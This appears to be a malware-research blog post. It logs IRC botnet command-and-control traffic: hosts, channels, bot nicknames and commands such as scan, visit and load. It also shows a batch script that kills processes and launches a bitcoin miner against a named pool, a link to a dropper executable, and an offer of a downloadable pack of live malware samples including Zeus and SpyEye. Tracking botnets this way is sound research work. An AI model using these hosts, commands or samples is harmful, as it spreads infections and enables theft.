botnet hosted in United States Albuquerque Comcast Business Communications Llc)

C&C Server: Server Password: Username: MEAT Nickname: {iNF-00-DEU-XP-DELL-3588} Channel: ##hxxp## (Password: ) Channeltopic: :.http |.scan svrsvc_KOR 50 10 0 -c Now talking in ##hxxp## Topic On: [ ##hxxp## ] [ .http |.scan svrsvc_KOR 50 10 0 -c ] Topic 11 By 12: [ pe[ro ] hosting infos: http://whois.domaintools.com/ botnet hosted in Thailand Bangkok 453 Ladplacout Jorakhaebua)

Remote Host Port Number 2345 NICK New[USA|00|P|33843] PRIVMSG #!loco! :[M]: Thread Disabled. PRIVMSG #!loco! :[M]: Thread Activated: Sending Message With Email. USER XP-7233 * 0 :COMPUTERNAME MODE New[USA|00|P|33843] -ix JOIN #!loco! PONG 22 MOTD hosting infos: http://whois.domaintools.com/

sfx.dload.asia(BitMines-btc.miner.03 hosted in Germany Hetzner Online Ag)

Resolved : [sfx.dload.asia] To [] Resolved : [sfx.dload.asia] To [] Resolved : [sfx.dload.asia] To [] yz.bat: ping -n 2 taskkill /f /im svchoost.exe taskkill /f /im mamita.exe taskkill /f /im x11811.exe taskkill /f /im Winlogon2.exe x30811.exe -a 60 -g yes -o http://sfx.dload.asia:8332/ -u redem_g -p x1x2x3x4x5 -t 2 file downloaded after login: http://sfx.dload.asia:8332/ -u botnet hosted in Turkey Netdirect)

Remote Host Port Number 4244 PASS google_cache2.tmp NICK new[iRooT-XP-USA]572986 USER 5729 “” “TsGh” :5729 JOIN #!N!# WTF PRIVMSG #!N!# :http://tips2x1.bloger.hr Has Been Visited! Now talking in #!N!# Topic On: [ #!N!# ] [ .visit http://tips2x1.bloger.hr ] Topic By: [ NhG ] hosting infos: http://whois.domaintools.com/ hosted in United States Amsterdam Santrex Internet Services Ltd)

Remote Host Port Number 80 6667 Clients: I have 112 clients and 0 servers Local users: Current Local Users: 112 Max: 251 Global users: Current Global Users: 112 Max: 251 PONG :D5E8DE88 JOIN #|Bots|# PONG :Vater.irc.mit.edu NICK n{US|XP-32a}jxeicyv USER jxeicyv 0 * :jxeicyv Now talking in #|Bots|# Joins: {HU|W7-64u}txhnliy [txhnliy@rox-7506984E.prtelecom.hu] Modes On: [

big4eva.no-ip.biz(ngrBot hosted in Russian Federation Mir Telematiki Ltd)

Remote Host Port Number 6667 Clients: I have 73 clients and 0 servers Local users: Current Local Users: 73 Max: 106 Global users: Current Global Users: 73 Max: 106 NICK SB|USA|XP|XHVDhcSI USER SB|USA|XP|XHVDhcSI big4eva.no-ip.biz SB|USA|XP|XHVDhcSI :SB|USA|XP|XHVDhcSI JOIN #irc NICK SB|USA|XP|vxwfnfOz USER SB|USA|XP|vxwfnfOz big4eva.no-ip.biz SB|USA|XP|vxwfnfOz :SB|USA|XP|vxwfnfOz Now talking in ##xcn Modes On: [ ##xcn ] botnet hosted in United States Franklin Mddhosting Llc)

Remote Host Port Number 1866 The data identified by the following URLs was then requested from the remote web server: http://dl.dropbox.com/u/55297842/visitweb.exe NICK n[USA|XP|COMPUTERNAME]kvrizpu USER hh “” “lol” :hh JOIN #!g! PONG 422 Now talking in #!g! Topic On: [ #!g! ] [ .load /99/106/112/81/55/59/40/110/116/35/105/120/111/108/117/108/110/38/127/122/100/56/126/9/22/45/45/35/61/47/45/56/47/117/104/83/104/119/126/71/120/46/102/126/105/ ] Topic By: [ evoL1x ] hosting infos: http://whois.domaintools.com/

120mb malware samples

This package contain alot of irc bots like ngrBot,Insomnia and banking trojans like Zeus,Spyeye but the best part of it are the files with the name FuckUPiggw.exe,FuckUPig.exe from one of my fans lol Download Download Download